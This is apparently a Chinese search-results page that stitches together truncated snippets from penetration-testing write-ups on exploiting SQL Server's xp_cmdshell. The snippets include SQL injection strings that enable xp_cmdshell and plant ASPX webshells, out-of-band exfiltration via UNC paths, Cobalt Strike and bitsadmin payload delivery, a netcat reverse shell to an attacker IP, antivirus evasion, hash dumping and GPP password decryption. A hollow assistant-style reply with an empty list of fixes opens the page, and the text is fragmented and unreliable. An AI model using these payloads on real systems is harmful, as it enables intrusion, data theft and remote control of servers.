您好!感谢您的提问。
在这个问题中,您提到了 "xp_cmdshell" 这个命令。这是一个 SQL Server 的扩展存储过程,它允许您在 SQL Server 中执行操作系统命令。您提到了拒绝访问的问题,这可能是由于您的 SQL Server 服务帐户没有足够的权限来执行该命令。
为了解决这个问题,您可以尝试以下方法:
希望这些信息能够帮助您解决问题。如果您有其他问题,请随时提问。
配置文件+未授权访问 扫描之后,看了下报告排除了误报,发现某个xml配置文件包含了很多信息,比如数据库账号密码,微信AppId等等。 习惯性将路径拼接一下访问一下url,好家伙,未授权。...好在有源代码,通过关键词语搜索全局,找到多个名为uploadfile的文件夹的路径,通过这些路径拼接到url并一个个尝试访问即可,如下图,访问未报错即证明路径正确。...使用正确的url通过哥斯拉连接成功,GetShell达成。...考虑到配置文件的未授权访问,于是又在bp中删除了cookie,发现此查询页面也可以未授权访问,而由代码审计中的配置文件知道数据库为sql server,如果可以开启xp_cmdshell,那么便可以直接远程命令执行...上线 虽然之前的都比较顺利,但是在执行上线的时候遭遇了挫折,首先是通过Cobalt Strike的pwoershell一句话和bitsadmin上线均失败,显示拒绝访问。
0x03 尝试在111.*.*.59主机getshell 尝试写一句话 先在下面的路径中写入txt文件验证网站路径到底是哪一个 D:\bak\20170226\bak\20170403.2\webapp...,在写入 D:\bak\20170226\webapp\Content\layer\123.txt时,访问http://111.*.*.59/Content/layer/123.txt能正常访问到123...>^ > D:\bak\20170226\webapp\Content\layer\cc.aspx';-- 访问时可以看到...尝试直接下载shell到服务器 使用bitsadmin下载时并没有成功,访问http://111.*.*.59/Content/layer/aaa.aspx返回404 uname=test';exec...0x04 查数据库相关信息 找到数据库配置文件 ? ? ? 尝试登陆 找到了用户表,有用户名、密码、姓名、手机号、邮箱、身份证号 ?
‘show advanced options’,1; 当设置advanced options参数为1时,系统才允许修改高级选项; reconfigure; exec sp_configure ‘xp_cmdshell...添加用户的命令net user /add不能被执行: 一般是由于net.exe文件不存在或者拒绝被调用导致,可通过上传net.exe文件来解决,包括tasklist等命令无法被执行时,都可以通过上传相应可执行文件来解决...2.提权exp或者自己远程编译的脚本无法执行: 检查是否当前文件具有可读、写、执行权限,尝试修改目录、文件的权限,使用chmod u+x,假如无法修改权限的话就寻找具有相应权限的目录重新上传执行。...① 可以使用工具pwdump来抓取管理员hash,配合彩虹表或者在线hash破解,获得管理员的明文密码,这个可以作为自己的密码表,在进行内网其他机器的登陆时尝试。...④ 各款浏览器的保存登陆密码,作为自己的密码表,在进行内网其他机器的登陆时尝试。 ⑤ 有无V**连接信息。 2. 内网探测 ① 通过cmd下执行命令arp –a,查看相邻主机IP。
所有话题标签:#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持 #防护绕过 #内网安全 #实战案例#其他笔记 #资源分享 #MSF 基本信息探测: 目标站点:...看来Sqlmap是行不通了,继续尝试一下我们曾经常用的阿D注入神器看看吧!...阿D注入工具能识别这个注入点,而且在cmd/上传模块中的底部有一个上传文件的功能,但是这里仍然不能列出目录,执行部分系统命令时返回的也都是乱码,不过这里还有以下两个思路可以尝试。 1....; image.png 使用WSExplorer抓包工具抓的啊D注入工具上传功能提交的数据包如下,可以看到也是通过MSSQL中的xp_cmdshell组件来执行echo命令写入VBS文件的。...'-- 最后是利用啊D注入工具的上传功能将VBS添加管理员用户脚本上传至目标磁盘并成功执行,进入目标服务器后发现管理员是将net.exe和net1.exe的Everyone权限设置为拒绝了,所以无法执行
使用浏览器开发者工具或抓包工具检查与该文件相关的HTTP请求和响应,看是否有执行脚本的证据。4. 目录遍历尝试使用目录遍历技巧(如果适用)来访问上传目录下的文件,确认文件的实际存储位置和状态。5....文件访问:尝试访问返回的URL,但页面显示403 Forbidden,表明服务器禁止直接访问上传的.php文件。...影响:可能导致信息泄露、权限提升或服务拒绝攻击。案例:通过精心构造的HTTP请求头,使得Tomcat服务器在处理请求时发生混淆,攻击者可能利用此漏洞绕过访问控制,访问受保护的资源。...防止拒绝服务攻击:大量使用SLEEP的注入可以导致数据库服务器忙于处理无意义的等待操作,消耗系统资源,进而可能引起服务的拒绝。如何禁用SLEEP函数?...交互和进一步渗透:一旦获取shell,攻击者便能执行任意系统命令,进行文件浏览、权限提升、横向移动等操作。35.mmsql的xp_cmdshell函数禁用,如何提权?
: 目录扫描 使用御剑扫描目录: 访问http://192.168.59.139:27689/robots.txt获取信息,之后查看到一个affix目录 之后访问http://192.168.59.139...:27689/upfile/affix/提示列目录失败 之后访问http://192.168.59.139:27689/admin/file_down.aspx,发现缺少参数file 文件下载 之后构造参数...file进行测试,从中可以获取当前web网络路径信息 之后尝试使用.....之后获取Web账号密码:admin/asdadwn_d2112 登录WEB 之后使用之前获取的账号密码登录WEB系统 之后我们成功获取到了第一个Key:4k3s9m3d GetShell 之后通过文件上传功能上传...aspx后缀进行上传: 之后连接webshell 之后在Web目录下找到Key2: 权限提升 之后通过Webshell查看当前用户的权限发现是普通用户权限 之后对C盘下Administrator文件夹内容进行访问发现拒绝访问
执行时会卡一段时间,没有回显,也不显示:拒绝访问,说明不是360和火绒拦的。...Web根目录下找到一个web.config,里边存储着MSSQL数据库的连接信息,用的是SA用户,这时可以尝试xp_cmdshell、sp_oacreate等方式去执行命令,不出意外直接就能得到SYSTEM...而使用sp_oacreate执行ping、whoami命令时就有看到高权限运行的进程,所以说应该是可以提的。...注:我们在本地复现测试时发现使用低版本MSF的ms16_075_reflection_juicy模块怎样都提权不了,最后没办法,找朋友借了他的VPS测试了下,结果一次性就成功了,所以说在实战中还是得多尝试...坑点一: 目标好像存在什么WAF,上传Webshell时并没有查杀,但冰蝎马和其他一些大马、命令执行马在访问时一直转圈圈,没能解析成功,应该是被拦了,只能用哥斯拉asmx马和中国菜刀aspx马。
尝试延时注入,成功: ?...响应包出现延时,可以执行系统命令~ 如果没有开启,通过以下命令开启: (1)恢复/删除xp_cmdshell exec sp_addextendedproc xp_cmdshell,@dllname=...options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',0; RECONFIGURE; (3)# 启用xp_cmdshell EXEC sp_configure...通过xp_cmdshell执行powershell payload: ? 查看web log,发现存在访问记录: ? 事件日志显示服务器上线: ? beacon上线,执行系统命令: ?...上线后翻找服务器文件,可以在inetput目录下找到web服务配置文件: ? //inetpub文件夹是IIS(Internet Information Services)中Windows站点的根。
尝试将payload换成xp_cmdshell外带数据: ;DECLARE @a varchar(1000); Set @a='\\'%2b(master.dbo.fn_varbintohexstr(CONVERT...系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。...,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。...利用条件 服务器必须能正常访问联网 mysql的配置文件secure_file_priv="" 读取文件并返回文件内容为字符串。...要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。
Nmap扫描 使用Nmap扫描靶机的端口发现开启了445 SMB 和 1433 mssql 由于靶机已经关闭,所以这里smb登录就没有截图了,windows下直接\\ip地址就可以了 对445端口进行了无密码登录尝试...,登录之后看到一个配置文件里面有mssql的账号和密码 0x02.....exe” 使用powershell进入到当前用户的下载目录,在使用wget命令下载木马文件 现在目标机器上有了nc,那么本地监听,再用xp_cmdshell执行即可 xp_cmdshell “powershell...\nc64.exe -e cmd.exe 10.10.14.50 333” 目标主机xp_cmdshell运行这条命令即可将cmd弹到攻击机 此时进入桌面可以看到有一个文件,看样子是flag 看到flag...来执行了,直接用刚刚反弹过来的cmd去调powershell即可 注意,这里访问的文件是去分大小写的。
如果存储过程xp_cmdshell被删除,重修加载,如果是xplog70.dll文件被删除了还是别想了吧 dbcc addextendedproc("sp_oacreate","odsole70.dll...mssql2005 express版的缺少一些组件,写入文件时无法加载xpweb90.dll,拖入mssql2005企业版xpweb.dll无法加载,这个版本不知怎么写入文件。...原因: 5(拒绝访问。)。...hip规则,无意中发现某站提到mcafee hip配置文件在注册表中HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\HIP,导出注册表覆盖本地发现3389访问限制了ip ?...1,删除存储过程execsp_dropextendedproc ‘xp_cmdshell’,最好删除xplog70.dll等文件 2,网站数据库不要使用sa账户,对服务运行权限设定为普通账户 3,安装相关安全软件
1、数据库口令枚举 这个很好理解,当数据库的端口对外开放,任何互联网上的人都可以访问该端口时,那么我们就可以对其进行暴力破解,是否能破解成功,取决于其口令设置的复杂度,以及我们自己密码字典是否覆盖其密码...,否则是无法成功暴力破解的,如果你已经获得了内网的权限,内网所有的数据库端口默认都是可以访问的,除非做网络隔离,无法跨越网段,所以对于口令枚举这种方式,在内网横向移动时是一个不错的方法。...它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。...PortBrute 对其进行暴力枚举尝试 外网爆破可以使用这种方式,如果是内网尝试爆破弱口令,不宜使用批量扫描工具,建议使用 osql、sqlcmd 等原生工具,进行单个账号密码尝试,以减少被流量审计的可能性...第三步:尝试使用 xp_cmdshell 执行系统命令 首先看看当前数据库的版本信息,使用命令 SELECT @@version,发现数据库版本为 MSSQL 2012,执行下面的命令查看是否存在 xp_cmdshell
身份认证绕过和BAC 当你访问「https://admintest.Target.com」时,会被重定向到「https://admintest.Target.com/admin/login.aspx」。...将图中标记的三个Header删除之后,他们便能够访问目标管理面板了: 通过使用Burp的匹配和替换功能,或使用Burp拦截响应: change 302 Moved Temporarily to 200...既然使用了一样的策略机制,那也就意味着,他们同样能够访问该节点并通过身份认证绕过来添加一个管理员账号。...他们当时的第一反应就是尝试下列查询语句: Select * from users 果不其然,他们获取到了所有的用户信息,其中包括用户密码、电子邮件和用户名等数据: 远程代码执行RCE 由于目标站点所使用的数据库是...mssql,因此他们便打算利用xp_cmdshell来尝试提权至RCE。
提示的是xp_cmdshell未开启,由于之前扫出来有堆叠注入,尝试运用存储过程打开xp_cmdshell Payload: userName=admin';exec sp_configure 'show...尝试传个ms-16-032的exp上去,直接上传失败 ?...修改一下frp的配置文件 ? 保存配置文件后在frp文件夹下启动frp ./frpc -c frpc.ini ?...但由于bc站往往打一枪换一个地方,这些域名往往大部分是不可用的,因此需要再确认域名的存活状态,使用脚本最终得到了一百多个存活域名 ?...在使用脚本批量访问带漏洞的URL,把生成的request利用多线程脚本批量发起请求去跑这个请求 python3 sqlmap.py -r "{0}" --dbms="Microsoft SQL Server
它允许控制数据的访问方式,使用execute命令执行存储过程。...:**是SQLServer的使用者编写的存储过程 系统数据库 系统数据库默认创建时就会存在,有以下4种 数据库名 含义 master master数据库控制SQLserver数据库所有方面。...SQLserver agent将会使用这个库。 tempdb 据库是一个非常特殊的数据库,供所有来访问你的SQL Server的用户使用。...2、使用sp_oacreate进行提权|无回显 0x01 sp_oacreate简介 调用wscript.shel执行命令 sp_oacreate系统存储过程可以用于对文件删除、复制、移动等操作,还可以配合...系统管理员使用sp_configure启用sp_oacreate和sp_oamethod系统存储过程对OLE自动化过程的访问(OLE Automation Procedures) 在效果方面,sp_oacreate
1、使用xp_cmdshell进行提权 # 启用xp_cmdshell EXEC master..sp_configure 'show advanced options', 1;RECONFIGURE;...一般在启动项、计划任务,服务里查找错误配置,尝试提权。 3.2 可信任服务路径漏洞 当一个服务的可执行文件路径含有空格,却没有使用双引号引起来,那么这个服务就存在漏洞。...根据优先级,系统会对文件路径中空格的所有可能进行尝试,直到找到一个匹配的程序。...4、组策略首选项提权 SYSVOL是域内的共享文件夹,用来存放登录脚本、组策略脚本等信息。当域管理员通过组策略修改密码时,在脚本中引入用户密码,就可能导致安全问题。...(1)访问SYSVOL共享文件夹,搜索包含“cpassword”的XML文件,获取AES加密的密码。 ? (2)使用kali自带的gpp-decrypt进行破解 ?
操作系统会对文件路径中空格的所有可能进行尝试,直到找到一个匹配的程序。...使用Windows内建工具icacls查看路径中受影响文件夹的权限,(M)代表修改权限,(F)代表完全控制,(CI)代表从属容器将继承访问控制项,(OI)代表从属文件将继承访问控制项。 3.攻击。...将我们需要执行的exe根据需要重命名并放置在可写入的有漏洞目录下,然后运行如下命令尝试重启服务,如果失败的话等待服务器重启时执行exe,成功提权后记得清理痕迹。...如果我们将这个值修改成任何命令,那意味着这个命令在该服务下一次启动时,将会以SYSTEM权限运行。 当尝试启动服务时,它会返回一个错误。...TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION; 读文件:select load_file('c:\boot.ini') 移动文件:select
双击日志存档文件即可打开日志文件查看器,并可以对日志进行筛选或者导出等操作。 ? 另外,MSSQ提供了一个工具SQL Server Profiler ,方便查找和发现SQL执行的效率和语句问题。 ?...筛选后的结果,可以很清晰的识别用户登录信息,记录内容包括用户登录时间、登录是否成功、登录使用的账号以及远程登录时用户使用的IP地址。...如下图:客户端:192.168.204.1进行尝试弱口令登录,并发现其中有一条登录成功的记录。 ?...0x02 SQL注入入侵痕迹 在利用SQL注入漏洞的过程中,我们会尝试利用sqlmap的--os-shell参数取得shell,如操作不慎,可能留下一些sqlmap创建的临时表和自定义函数。...2、检查xp_cmdshell等存储过程 xp_cmdshell在mssql2005之后的版本中是默认禁止的,查看xp_cmdshell是否被启用。
因为是sql server,所以可以直接--os-shell开启xp_cmdshell来命令执行。当前的权限还很低,为了进一步提权,得上个CS马。...1.2.3 成功地传上了马,但执行木马时,却发现无法执行。后面又尝试把马放到其他几个目录执行,也还是不行。可能是权限问题。...正在我一筹莫展的时候,朋友提醒我可以尝试改一下冰蝎的默认密码。结果传上去再连真就不被杀了。 1.4 成功上线CS提权 1.4.1 在冰蝎的“命令执行”模块下,执行命令时回显拒绝访问。...那么就可以使用sqlmap -d "mysql://root:密码@xxx.xxx.xxx.xxx:3306/mysql" --random-agent --os-shell 尝试UDF提权。...2.3.2 可以使用如下方法绕过火绒添加用户。
领取专属 10元无门槛券
手把手带您无忧上云